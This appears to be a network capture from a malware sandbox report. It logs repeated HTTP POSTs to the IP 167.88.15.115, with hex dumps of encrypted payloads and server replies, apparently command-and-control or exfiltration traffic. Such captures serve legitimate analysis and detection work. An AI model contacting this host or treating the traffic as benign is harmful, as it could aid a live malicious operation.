Aug 28, 2021 00:06:41.793859959 CEST	6384	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 80 Connection: keep-alive Data Raw: f8 13 85 62 ee 28 8c 54 85 78 ee 7f 25 53 b3 86 5d ee 4d ab 8d 9b a0 0e 63 86 a8 53 c4 6d ac a4 3a 58 ef 33 8d 3b 8d a9 67 22 c6 93 83 e3 58 94 57 05 13 3b d6 c0 bf 94 44 19 c8 a3 d4 2d 92 10 d9 20 a7 4e 2d f4 c6 4a 53 24 55 9f 6e 61 a3 00 Data Ascii: b(Tx%S]McSm:X3;g"XW;D- N-JS$Una
Aug 28, 2021 00:06:41.795608044 CEST	6384	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 410
Aug 28, 2021 00:06:41.919173956 CEST	6385	OUT	Data Raw: ae c4 d6 f4 03 b0 75 9d 5e 47 64 71 bf 4f 8e 97 a9 c4 1d 66 55 a3 ca 7a cc 58 41 a8 e5 38 6b 4e 2f 32 82 2d 57 dd db 7c 8d ca 14 3b 09 eb 5b a4 f7 11 bd 14 44 b1 03 0b f9 5d 28 aa 70 cb b7 26 db 17 43 8e cc 62 41 cb e8 9f d8 8a 90 8f 72 e0 fc 9b Data Ascii: u^GdqOfUzXA8kN/2-W\|;[D](p&CbAryX\|0w22_wzkF^V1Hw181.fp72Anfr;j}%WdY%%/yy\|EpVHq[,K\|5bkE1
Aug 28, 2021 00:06:42.311165094 CEST	6386	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 212 Connection: keep-alive Data Raw: e9 1f cc d6 39 c4 e3 03 a6 25 60 aa 05 43 8d c8 48 51 98 fb 0d 0a 3f d3 81 bd e1 f5 4f 63 41 a8 c4 44 bd 75 91 5f 41 17 b0 02 f0 f3 fa d2 0b 5a 89 04 f9 63 06 48 53 23 11 89 58 7d 51 fd 83 a7 7f 57 46 fc 21 7e 78 41 0e 66 6a d9 8a 7a e3 d0 08 fc 62 3b e6 59 85 52 63 c7 99 7b cb 3c 1f 34 3d e7 29 a8 22 f1 3f 7c 3f 65 f9 2e b6 02 39 f1 d0 e5 31 92 a3 f2 13 fb cd a3 f9 2e 2b 6f 61 9e c3 f8 7a 00 f5 05 88 13 c7 47 29 a6 dc b8 a0 cd 2f a4 7e c1 e0 b6 c1 ed c5 09 3c 0c 8f a6 db 11 4c f3 f4 e2 d2 79 2e 19 ab 35 3f 00 b1 aa 5e b5 7b fc 4f 38 7e 82 0f 7d f7 b1 92 d2 54 30 b5 5b 47 85 09 96 29 15 8b 59 00 66 b2 c2 7b 9e 59 32 ac 65 fc 1b Data Ascii: 9%`CHQ?OcADu_AZcHS#X}QWF!~xAfjzb;YRc{<4=)"?\|?e.91.+oazG)/~<Ly.5?^{O8~}T0[G)Yf{Y2e
Aug 28, 2021 00:06:42.438714027 CEST	6387	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 660
Aug 28, 2021 00:06:42.561690092 CEST	6388	OUT	Data Raw: 57 c5 41 73 15 75 62 4d be 05 22 5b b1 ee c4 45 25 56 dc fd 70 eb 2f e6 de 87 8c c9 b7 df f3 69 81 61 67 8b fc 16 ba 06 d0 db 4e 73 f2 4f f3 5c bd 27 ca 67 44 d7 64 6a 96 59 93 8c e7 98 94 dd 10 b7 d9 51 87 3a 48 10 9a d6 2d 94 9d ba f3 90 92 31 Data Ascii: WAsubM"[E%Vp/iagNsO\'gDdjYQ:H-1&.9God;uld1TEmN/W[Y-1@}3fDEOJ@;.^\Pp2(Z,d:THuGw,bH(5 (%^nxlKE^\|\|JTU
Aug 28, 2021 00:06:42.949615002 CEST	6390	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 132 Connection: keep-alive Data Raw: 0e f0 bb ee fb 6d 19 c6 fa 08 16 f4 7c fd 13 df 2d 50 2c d9 d6 95 40 f2 e7 e7 f9 d7 c6 3f b8 ec 36 8f 62 e0 36 79 e4 38 c0 7c d2 c3 04 c4 52 fd be 49 85 00 3f 24 fb 37 57 51 bd a8 8b 7a 85 50 ab 42 85 9b 0d 27 36 07 b7 a8 02 c4 0e ec da e2 f4 af 77 fc 20 16 a2 57 d0 b2 ca e3 e6 86 f6 88 6e 42 69 0d 5f d0 b9 f2 47 74 58 22 8a d5 f5 ce 66 46 ab bd 3a a8 8f 85 3f 15 66 36 e1 14 d6 27 f1 ae 9d c7 Data Ascii: m\|-P,@?6b6y8\|RI?$7WQzPB'6w WnBi_GtX"fF:?f6'
Aug 28, 2021 00:06:43.054327965 CEST	6391	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 691
Aug 28, 2021 00:06:43.178595066 CEST	6392	OUT	Data Raw: 66 ca 31 a0 97 ad 9f 61 3f 21 25 e7 9f 0c 8a 57 35 21 30 33 43 d6 90 7a 90 04 09 96 25 d1 35 04 55 aa 7e d9 cd 04 d1 4a 0f 4c 04 4c 89 4a 84 4b c6 af bd 55 50 44 a0 8f 3a b6 10 94 a4 0a 3d 6c ea 21 92 f3 8d b0 88 31 4e e5 24 f5 d3 45 ef 47 7e bc Data Ascii: f1a?!%W5!03Cz%5U~JLLJKUPD:=l!1N$EG~u>ai'j!:Xmp=A>NI_4R+(H>U6P*}?9(y3$jgTZI7 Im">$~Q!m
Aug 28, 2021 00:06:43.580508947 CEST	6394	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 219 Connection: keep-alive Data Raw: 51 b8 f6 c8 ba 93 cd 8b 2f fd 45 03 49 4f 53 48 9a e6 22 15 44 3c e0 0b 2b ff 5a b9 94 48 ec 14 68 21 76 73 33 05 f4 0e 35 5b 87 51 8b 02 37 81 e4 5c ce 9f 3e 9d ab 88 37 99 94 9b d8 60 2f cd 3d 77 ae 61 0a 66 22 d6 b4 c4 46 a0 5e 1a 98 d7 0e be 8a 07 58 1a 3f 22 07 bc 2d 24 a8 2d ff 08 7e be cd 6d a2 5b d2 de d4 30 67 cc 11 19 6b 8c 42 e7 78 71 94 c9 45 a9 4d ca 0b 25 5c 9d 64 90 d5 26 87 09 cd 3f df 82 7a 25 00 a2 b4 a0 f1 6b 4b 9b 3e c0 97 6f 75 51 d8 6f 76 bb 45 42 14 36 02 ab 0f 8d af 77 9b 98 65 53 f5 23 e9 38 4c cc 78 3a 00 41 50 27 5f 6b cb f7 b1 aa 36 6b a5 ee a8 79 ad 96 ea c4 0b 7c ee 4e c2 31 31 f5 73 c3 c0 1c 61 a1 60 51 6e 66 36 22 38 Data Ascii: Q/EIOSH"D<+ZHh!vs35[Q7\>7`/=waf"F^X?"-$-~m[0gkBxqEM%\d&?z%kK>ouQovEB6weS#8Lx:AP'_k6ky\|N11sa`Qnf6"8
Aug 28, 2021 00:06:43.696463108 CEST	6394	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 626
Aug 28, 2021 00:06:44.213987112 CEST	6397	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 294 Connection: keep-alive Data Raw: f6 1d 36 12 58 0a 54 5e 22 60 6a 63 e9 90 cf d0 f1 75 4b 0c d6 63 63 35 49 25 31 ff 59 9a 38 33 50 d1 6b 64 38 79 d1 bc d7 ed 9c 3c 8b c8 96 36 8b e7 8b 7d 4e 7c 2f 1b 6b 29 2b 9e fd d1 8f d2 cb db 1c c5 0e 11 97 31 c5 e7 9e e2 86 8d b3 bf 59 95 8d 0c 5c 41 e8 78 a1 37 b8 34 09 71 fd 31 0f a5 8c 14 98 7b 08 5d 2c 57 be ae 45 60 64 65 b0 03 9b 24 28 07 a5 8c ef c1 a9 bb 34 0a 2b 77 7a 21 78 5d 40 04 96 0f 88 af d8 54 74 f9 91 68 14 1f bb 6d fd 08 47 0d 36 63 5e ca a9 4c a1 34 12 79 7a 31 c7 a1 2a 93 10 eb ad 0d 24 75 5b c6 10 32 a8 f3 b8 eb 43 75 97 f5 ae 25 43 2d 37 6e 3e a8 d1 18 06 70 5e fe 79 4e 20 34 80 8d af 22 d2 61 d4 01 0d 00 71 2e c1 3d d1 2a a0 30 33 5a 63 ad ec 30 f4 7a d5 eb 93 71 ed 7e 4e 3a 64 7e 2f 47 07 bf 4b 9b 4b 7c 42 08 40 dd 6d 17 c9 d4 a5 95 7b 63 06 26 99 91 c1 d0 c5 ca f4 2f c4 3c 03 8b 1e 2a 51 dc 44 23 f8 98 cd c7 e1 d7 2e ef 00 06 42 3f 41 d0 Data Ascii: 6XT^"`jcuKcc5I%1Y83Pkd8y<6}N\|/k)+1Y\Ax74q1{],WE`de$(4+wz!x]@TthmG6c^L4yz1$u[2Cu%C-7n>p^yN 4"aq.=03Zc0zq~N:d~/GKK\|B@m{c&/<*QD#.B?A
Aug 28, 2021 00:06:44.337426901 CEST	6397	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 551
Aug 28, 2021 00:06:44.858036041 CEST	6400	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 87 Connection: keep-alive Data Raw: 0a 0c 81 c6 8d d3 00 38 67 5a 29 79 84 7a ce 89 30 0b f8 9a e4 c0 7f 72 56 bc 0a f2 fe ef 6d de 83 20 3a ca bc 84 10 61 d8 fa 9f 66 c7 68 f1 5f 6d 19 97 70 4c 7b d3 bd bb 8f 8d 28 15 5a ab 0f 0e 1b 09 2f b0 6b b7 bb 4a 0d fb 96 b1 bf 31 df 36 48 b1 f9 75 39 6f Data Ascii: 8gZ)yz0rVm :afh_mpL{(Z/kJ16Hu9o
Aug 28, 2021 00:06:45.001122952 CEST	6400	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 300
Aug 28, 2021 00:06:45.531478882 CEST	6404	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 331 Connection: keep-alive Data Raw: 50 30 09 ec 61 d4 9a e0 ca 71 55 7b 76 70 72 a0 3c 07 dc aa ae 8f 20 5f 91 c0 d6 33 44 02 5a d2 5a 58 e2 14 16 23 43 07 c8 20 4b c8 23 26 ef bc 9d c8 55 a0 60 b8 9f a6 3c 16 b0 4c 97 2a 1c e5 08 6a 8d ab 57 a5 fb f6 75 e4 26 1e 54 e3 95 3b 30 66 92 38 ac 22 6d 95 99 cd 5f f7 a9 78 52 69 a0 c6 7b 88 4d fc 58 fa 92 34 c1 0e 4d 81 2e 4c 7a 68 2f 6c bc 58 54 72 75 ae 6b 96 56 20 ed 92 dd 9d 74 60 61 3c f1 ed 7e 8a 90 5e 70 5f d8 2c 87 92 88 5c 9e d5 7f a9 40 e9 99 8d a2 7e fe ba e1 d5 18 f6 fd 0b cb 2a da 06 1b df 56 be 0b d6 ab d3 da 1d b3 45 4d 92 9e fd 6f 67 84 d8 e4 87 73 e4 be 77 6d e2 6a e8 01 64 2d 5f 24 4b 60 60 72 af be 0b 73 fa a4 91 81 f1 c8 79 a9 c4 0d ae 7e 4d f6 56 41 ec 78 e7 4e 84 ff b8 ba b2 d9 7a ea 9c ba 06 51 0e db fe dc ab 00 7e c9 86 b2 f3 83 b8 8e 5f 76 7c bc 92 8a 52 93 b9 d4 54 13 25 02 c1 6c a8 d8 99 77 cb 2b 42 fe a3 e3 0a 06 b9 d7 ba e8 67 bd 51 cd fe d5 7c 22 b2 85 cf a3 53 50 62 6f fa 65 85 9a c3 f0 29 aa e9 3c be 91 a7 0b 68 e9 8f 6b 24 51 a8 e4 a4 47 Data Ascii: P0aqU{vpr< _3DZZX#C K#&U`<LjWu&T;0f8"m_xRi{MX4M.Lzh/lXTrukV t`a<~^p_,\@~VEMogswmjd-_$K``rsy~MVAxNzQ~_v\|RT%lw+BgQ\|"SPboe)<hk$QG
Aug 28, 2021 00:06:45.648154020 CEST	6405	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 721
Aug 28, 2021 00:06:46.166675091 CEST	6410	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 290 Connection: keep-alive Data Raw: ce 41 fa a4 cf cd 1b a6 13 a4 56 c4 37 bf 39 b0 4d 04 5b f1 29 6c 99 0f 80 40 0f 3d d4 d3 0b 92 1c 7c 2d ce b8 62 db e6 a4 7a 3a 0d 26 3a 46 5f 1a 82 cd 40 ab fd b6 fa eb 69 2d 7f 61 ea 01 b0 b2 27 03 a1 37 22 72 50 7e 7e 3e e8 4d 31 40 27 92 60 b0 8f 2a 5c b1 fb a1 c3 e5 a3 6d 36 96 88 80 0d 05 ac 70 4c 97 fb 33 da 2d 17 b7 7f aa 38 e6 5e 47 92 b6 df fc 81 18 b6 4a 10 d8 8f c4 6b 5d 36 79 41 cb c3 cc dd b1 0b a2 ca 23 c8 cb ac f7 10 91 ea 54 a3 a5 31 1c c0 b0 67 5b 71 3f e1 a5 07 fe 50 8c 89 2b 3b 25 6d 07 21 cf a0 5e 16 cf 23 4b fb 0d 7b fb 22 f5 78 2f 8f 88 a1 5e c6 3c de 89 f7 bf 47 e7 df 40 37 23 4f 07 ee 06 f8 0d 00 7a 18 d5 a6 e1 21 49 f3 f4 ee 65 96 8a b1 77 4b 02 26 9b bb 7d 6f 11 76 57 61 0f 47 c3 99 51 8b 52 07 d3 2d 0e 3a 19 a9 c9 a8 99 2c 32 06 50 d1 5a 7e a1 ad 8e f5 16 9e 1b 68 81 3e a2 1a 1c 09 96 30 1a b8 7d e3 46 90 7b ff 80 30 80 7a 8a 6e Data Ascii: AV79M[)l@=\|-bz:&:F_@i-a'7"rP~~>M1@'`*\m6pL3-8^GJk]6yA#T1g[q?P+;%m!^#K{"x/^<G@7#Oz!IewK&}ovWaGQR-:,2PZ~h>0}F{0zn
Aug 28, 2021 00:06:46.301817894 CEST	6411	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 351
Aug 28, 2021 00:06:46.814055920 CEST	6415	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 96 Connection: keep-alive Data Raw: 5e 6b 48 75 05 7d ba 3a ef 67 5c 71 91 2a 4c 00 6c 72 0a 0a 78 8f 0d 18 0e 58 77 e4 b4 8d d9 af 59 cb e6 e8 30 bc 5e 3d 5a 3c 78 28 2f a5 43 48 22 1d 97 fb f1 b8 56 2a 49 3a 01 55 d8 13 1b 02 0d 51 e5 cf 5f a8 e2 89 30 d0 7a 72 37 86 c2 39 fd a2 3d 55 36 2f 44 e0 89 2d 66 a6 01 e8 ea ad Data Ascii: ^kHu}:g\qLlrxXwY0^=Z<x(/CH"VI:UQ_0zr79=U6/D-f
Aug 28, 2021 00:06:46.929552078 CEST	6415	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 664
Aug 28, 2021 00:06:47.446979046 CEST	6419	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 170 Connection: keep-alive Data Raw: 0b ff 0c 5c 7a 29 43 84 af ca 92 48 62 2a bc cc 85 b5 98 4d 98 86 a5 28 74 67 dc 1c c4 9b 06 fa ac df 3e 99 36 63 c5 2c ec f4 8c 12 7a 97 ff 68 aa 68 d5 f3 af b4 45 c4 cb d6 6c e1 05 4f 6f 10 41 ef 3c 49 41 3f ff 16 59 37 8d b2 45 05 9d 03 e8 e3 81 a2 34 bd 89 87 8e 00 e7 05 91 0a 6c 1e 7c e0 bd bd 69 e8 ee 27 d3 5a c7 5a 07 d2 2e 56 2d 3c 3b 46 92 67 30 6e 7d db 48 86 d3 43 01 08 f0 ca 07 84 d0 99 ef 34 fc 0d c8 3a f9 59 64 e5 4a 77 9e 7b 61 d5 d5 78 57 6d 9e d8 a9 90 7b 45 b0 8e 50 01 2b 3c 8a 4f d8 73 Data Ascii: \z)CHb*M(tg>6c,zhhElOoA<IA?Y7E4l\|i'ZZ.V-<;Fg0n}HC4:YdJw{axWm{EP+<Os
Aug 28, 2021 00:06:47.554536104 CEST	6419	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 561
Aug 28, 2021 00:06:48.075583935 CEST	6423	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 192 Connection: keep-alive Data Raw: 53 90 20 0a 10 54 4d 42 9a 56 be ab db 8f 8e 29 a5 0d 2d cf c3 8b 25 6f 59 74 5c 30 35 f1 7c e3 90 f8 4f d9 41 71 3f b3 4a 39 14 c8 40 c2 ab 64 cd 34 89 72 1a 35 6e 1a a9 82 aa fd 7d c7 d6 3e f5 77 d8 01 5a 9e 97 1b 83 2f c8 07 bc 9e fb 70 2e e5 82 11 6c e7 f9 96 15 b0 c5 0d 21 e5 f3 9c e6 de 54 c4 c5 df b4 8f cf 06 8e 2d a7 46 80 00 fb 01 9f ef 72 3f 56 46 60 e9 13 6d c1 91 20 47 83 f7 3e da ed ab 7e 99 77 c7 7b 52 6e 95 67 86 c6 fb bc 5d f8 69 40 f9 62 17 0a ec a5 14 13 93 54 6b e0 15 7a 16 0b be 75 81 f5 6c a4 c4 cc b3 b4 8b 05 eb 94 af 6a 0c ca 0c d1 08 19 5e 5e d5 Data Ascii: S TMBV)-%oYt\05\|OAq?J9@d4r5n}>wZ/p.l!T-Fr?VF`m G>~w{Rng]i@bTkzulj^^
Aug 28, 2021 00:06:48.179693937 CEST	6423	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 688
Aug 28, 2021 00:06:48.700378895 CEST	6426	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 161 Connection: keep-alive Data Raw: ac 98 fd 66 11 96 09 20 03 a6 a6 d3 8d 5c 96 7b 8b fc 1a 2e 3f ef 84 90 f8 5b 19 bf d7 e1 77 96 b7 47 cd bd 72 fc 76 90 a1 9d da 59 9a e7 6e 48 5a 9e 2a b7 35 e4 52 36 6c 84 1d 06 a8 b1 b3 f1 b6 a9 6f 28 6b 0d 2c 09 a3 1e 4f f0 0b e3 ea 61 00 7a 55 4a f9 6b 2b 67 3d f7 6f 37 01 17 c3 7b 74 21 a4 7c ce 75 33 b5 34 10 1f b6 26 d2 9b d6 ae a1 92 2f d5 89 01 6c d4 c1 f9 c9 67 dd 37 1e ba c5 bd 0b 64 da 46 c2 43 99 25 f3 fe 9c ca 25 90 00 62 df 05 de c3 c2 bd 01 5f 94 ce 83 a9 27 cc Data Ascii: f \{.?[wGrvYnHZ*5R6lo(k,OazUJk+g=o7{t!\|u34&/lg7dFC%%b_'
Aug 28, 2021 00:06:48.804641008 CEST	6426	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 639
Aug 28, 2021 00:06:49.312176943 CEST	6430	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 87 Connection: keep-alive Data Raw: 49 cd c6 7e 2a c1 00 c9 22 fa b6 b5 09 3c 5d 29 d7 ec 82 50 0e da 37 e1 e7 9a 74 4c 17 6a 7e 37 d6 c2 45 55 38 0d 82 c9 70 c8 f1 c6 c2 56 15 36 0b 75 91 42 71 92 b9 ce 05 66 d1 0c 35 da ab 4d 59 99 5a d0 1c d3 13 87 65 00 10 18 f6 dc a6 bc ba 6f c1 bf 9b 68 ab Data Ascii: I~*"<])P7tLj~7EU8pV6uBqf5MYZeoh
Aug 28, 2021 00:06:49.429790974 CEST	6430	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 544
Aug 28, 2021 00:06:49.951251030 CEST	6433	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: keep-alive Data Raw: c3 cd a7 50 67 7e d3 a5 ff fe d1 b0 13 bf ee 6c 82 fc 32 68 89 54 69 4e 89 ff d7 85 3d 08 34 40 5a fe b7 e7 c6 8a f2 b8 fb eb 30 17 88 7e 70 13 61 28 bc 20 26 bd fc 41 63 18 cc b6 85 a4 4e 18 87 55 1e 30 6d a8 dd ca ff 9e 52 16 6e 49 cd 6d 1a 34 d7 68 e3 77 3a 09 16 82 92 fc b5 35 84 43 e1 6b f7 9a 48 8d c9 f2 d4 cb 77 0c 71 95 bf 5e 5f 3f c3 57 44 c7 13 34 01 8c 08 8c a9 81 00 54 25 67 31 ba f3 92 a4 1a fb c4 e3 b4 9b 88 85 70 70 4f c7 7f 75 9a 4e 6a 22 eb 37 76 50 74 a7 81 84 00 f0 57 a8 b6 3d 98 28 18 80 54 37 88 25 7a fa 88 a5 ff 24 d7 94 a5 16 8e a0 b7 cc 2a e1 8b 3e 77 8c 22 06 b1 ba b7 be d1 80 60 d6 d0 e5 Data Ascii: Pg~l2hTiN=4@Z0~pa( &AcNU0mRnIm4hw:5CkHwq^_?WD4T%g1ppOuNj"7vPtW=(T7%z$*>w"`
Aug 28, 2021 00:06:50.086863995 CEST	6434	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 654
Aug 28, 2021 00:06:50.603185892 CEST	6440	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 305 Connection: keep-alive Data Raw: af 66 7d 2b f0 c5 65 89 53 a9 a8 70 8e ab 39 07 b0 8e 72 a2 a7 d9 ef 37 66 f0 52 d4 77 03 e9 45 a6 94 8f 4f 62 98 37 24 70 a7 37 82 d1 f3 ca ec f6 9a fd 71 ac 9a f8 04 74 cd f7 97 34 4f 35 4d 73 98 61 d7 fc cc e8 5e b0 2d b1 9e 65 0a 98 30 3a 30 be 58 7d d5 e4 55 73 a9 3e cf 0a cc 44 4c 86 1f fc a4 a5 af f4 0f b5 3f da 63 c6 72 d7 56 da e5 14 ac 9f 38 aa 4a 01 98 19 58 bc db 13 82 53 c7 db 8d 75 57 86 0d b2 18 67 c0 20 f1 2e b6 8f 2b ba 09 ad d6 fb 64 2c 7b 72 fb 3c 27 af b4 43 55 aa 89 af ad 2d 77 6d a6 eb e8 39 97 06 41 78 0a cf fc 7b f7 7d bd aa b0 d6 95 bc 36 6c 25 a1 c5 28 40 59 ca 89 37 c9 0d 43 ac 38 a4 ba 3b 86 6d 9f d7 a3 7e 56 56 bd 61 f7 5c d7 be 42 80 00 14 ad 36 f8 45 96 2b 04 11 1f c1 a2 9d b6 4d 4b 52 56 fb f0 b9 78 df 95 42 78 37 14 e1 89 93 19 be 89 89 1c 9b 80 f2 df 6f 7a 1b 79 46 99 b3 06 23 93 6b ec f5 4b 3e 81 81 43 be e1 ae c8 10 85 4b 77 bd 6e 38 ef a9 69 f0 af eb 88 ef 30 91 64 Data Ascii: f}+eSp9r7fRwEOb7$p7qt4O5Msa^-e0:0X}Us>DL?crV8JXSuWg .+d,{r<'CU-wm9Ax{}6l%(@Y7C8;m~VVa\B6E+MKRVxBx7ozyF#kK>CKwn8i0d
Aug 28, 2021 00:06:50.710783005 CEST	6440	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 254
Aug 28, 2021 00:06:51.232367992 CEST	6443	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 285 Connection: keep-alive Data Raw: 8b 0f 82 4a d6 68 3a 73 e7 f9 59 ba 6a 3e 06 c9 55 b0 ec e5 aa 4f ff 6b 7f 5a 2e a9 3a e6 0c 64 24 63 27 45 fc c0 90 e7 ca 77 fb 87 05 58 09 df 01 20 a9 23 29 72 46 a9 36 d9 5c 13 0d 2e 84 5e 70 13 89 8b d6 91 04 3d 92 13 12 cc 52 bc e3 74 86 d6 65 1b a1 5f 41 f5 b9 e3 8b d8 4a 18 12 4a d2 21 31 ee 49 6c a1 41 cb 90 d6 1e 09 14 30 8c 6d 44 cf 81 6b c0 68 0d a2 a1 7b b3 91 65 3a 08 2f c2 f4 73 07 18 5a 10 f8 17 47 f4 18 a1 fc c7 a4 c5 73 ba 1e 01 46 84 63 07 c1 53 e9 e4 24 c2 2d d3 a3 26 81 ac b5 b8 f7 75 0e 7b 7a f8 e6 bb ad 14 e4 21 18 c8 67 71 07 55 ac 88 5a 8b be d0 48 36 bf 5e be 3a 77 29 51 46 ac 3e 00 05 25 a1 de 41 3d e2 2f a1 7d e5 5c 67 d4 fb 07 57 75 80 08 b9 f0 c7 54 87 65 0d de 8c 28 c5 51 39 d4 d7 13 30 2a 41 7e 39 1d a3 76 82 24 21 ec 10 c9 57 d0 2e b0 2b 44 67 5c 30 52 66 5e a9 f0 d8 ae 04 2d ee 44 fd bf f0 5d 67 72 ad 22 93 70 Data Ascii: Jh:sYj>UOkZ.:d$c'EwX #)rF6\.^p=Rte_AJJ!1IlA0mDkh{e:/sZGsFcS$-&u{z!gqUZH6^:w)QF>%A=/}\gWuTe(Q90*A~9v$!W.+Dg\0Rf^-D]gr"p
Aug 28, 2021 00:06:51.374411106 CEST	6444	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 554
Aug 28, 2021 00:06:51.896114111 CEST	6447	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 279 Connection: keep-alive Data Raw: da c2 ca 13 28 6b 14 89 df 85 67 ae b5 fa 10 89 f3 ae 6e 27 5a 75 87 1a 3a 88 45 30 1b ec 77 2a c8 7e 6e ad c3 c6 dd 37 54 30 aa b6 16 22 c7 60 e9 41 42 9f d5 b5 26 57 eb 66 e9 ec 0f 7e 0f 1e 83 f5 a7 44 82 09 21 b3 1f 3e ab e5 5e 1b c4 0b 79 59 61 2c 3c 26 98 15 c8 a6 9e 21 7c 99 da 2d fa ab 11 df 72 be e0 ea ea b1 a4 38 4f 33 42 8e ee 3c e0 3c db 1d ec 86 4a 5d 9a 7e 4c b8 9c 90 75 4e 67 bf 57 54 15 08 ed a6 48 12 af f7 c3 2a bc ed e7 9b 3e 19 2d e0 4f 24 ee 2a 48 07 65 f9 5e 2a 40 7a c0 c7 ed 41 4b cc a7 83 81 40 b5 1b 8c ff e8 1a 32 f0 17 43 0d 2d f5 d0 16 b8 a5 49 a3 c4 cb a9 a5 25 00 71 50 3e 06 c7 27 93 86 22 cb 58 09 93 16 d0 67 df 38 21 f1 99 75 c6 97 47 74 f3 d3 96 b4 1f 05 d3 19 4b 1e ee a8 43 88 2d 86 6b 1a 7d 74 e9 64 ad 14 a7 c3 96 18 19 96 99 f7 20 e1 22 44 54 b3 06 66 3a 22 b7 39 f7 e8 71 44 4a d6 f5 c2 00 29 Data Ascii: (kgn'Zu:E0w~n7T0"`AB&Wf~D!>^yYa,<&!\|-r8O3B<<J]~LuNgWTH>-O$He^@zAK@2C-I%qP>'"Xg8!uGtKC-k}td "DTf:"9qDJ)
Aug 28, 2021 00:06:52.007832050 CEST	6447	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 238
Aug 28, 2021 00:06:52.507414103 CEST	6450	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 266 Connection: keep-alive Data Raw: 21 ea 36 e7 7c 89 9f c7 02 de 20 e6 73 af ba 9b 8f 87 64 fb 39 fa 71 d3 65 3b 41 ab 53 f8 14 dc 6b 48 a7 80 5b 05 15 aa 13 57 72 eb 8a a2 a0 2f f4 d6 4f cc cc 7c 64 3a f3 97 d8 51 c3 e8 43 2f f8 f2 d2 ec 40 17 0b f0 56 92 3f 09 08 01 71 39 d5 fc 4e 19 45 86 2d c8 05 74 4e 85 88 cb 33 08 9e 51 a1 da 39 f1 37 16 52 4a 92 03 84 ba 8a 1d ae 23 35 2d ed 2b 5e 84 7e a3 6d e9 13 d2 a6 8c 82 15 51 02 0e 8d 4c de 42 b4 df 1c f0 c4 82 e5 31 dd ba 72 c4 11 1f ce d8 41 47 6f b4 b0 b2 f2 48 d6 99 91 8b c4 51 54 b5 c4 df 1b 6a 6b 08 e5 a1 5b df d9 2c 9d 8c c1 44 00 e4 73 90 cc 7b fc a1 e2 cf 7e 67 44 3b 9b 99 08 bb f4 ac 5a 22 87 90 95 84 0c 59 55 8d a6 52 70 80 a9 66 4b 5f e4 42 90 47 16 80 82 af 82 03 c1 e1 81 63 21 07 b8 cf 22 9d 85 05 7e 04 33 80 83 21 c6 a6 15 4d 4a 34 c0 05 19 75 60 21 96 d2 71 Data Ascii: !6\| sd9qe;ASkH[Wr/O\|d:QC/@V?q9NE-tN3Q97RJ#5-+^~mQLB1rAGoHQTjk[,Ds{~gD;Z"YURpfK_BGc!"~3!MJ4u`!q
Aug 28, 2021 00:06:52.617228985 CEST	6450	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 475
Aug 28, 2021 00:06:53.141108990 CEST	6454	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 262 Connection: keep-alive Data Raw: 02 fa 69 f3 34 98 35 51 c8 8c 88 52 e4 cd c3 c1 87 4c 43 d2 ae 4c 5e bb 60 b3 45 41 37 67 1c a6 20 19 b2 2d d9 21 74 87 e6 83 7e b8 06 a9 c5 19 6c 40 9a 53 c2 ca b8 d3 6e 66 08 4d ac 80 26 62 d7 c8 a7 88 99 b0 fa f6 36 9e 50 db 2c 42 e7 3d 8c fc 30 92 d4 4e 6b c0 70 84 87 40 8c 44 73 dd af 22 60 11 29 92 f7 63 d5 c0 d8 76 e2 2c ce f3 4a 8c fe e2 f0 ee 1f 51 5e e2 59 e0 cb 58 39 92 65 e2 9e 39 0f b9 19 d7 9d c7 68 17 d8 f6 72 63 28 37 ef 31 9b a9 29 3f fd a6 b5 c9 7d f9 e6 8e cd 8a ff fa d1 2f e2 6e 7d 85 13 d9 bb 9a 0f 19 26 f9 26 62 5b 00 2a 3f d5 6a 61 3e 00 6e 71 43 46 13 b1 28 a1 0d 40 97 1b e5 05 15 e2 65 d3 ce 0a 07 3a a0 4d 0c 6d f2 b6 a1 52 15 eb e7 8e 4b dc a6 15 9d be 53 58 4a 9c d3 01 74 0e 58 b2 05 24 25 9b ad 2b 14 b1 a1 53 e3 4f 85 9b e6 a5 6a 6b 16 ae a0 9b cc 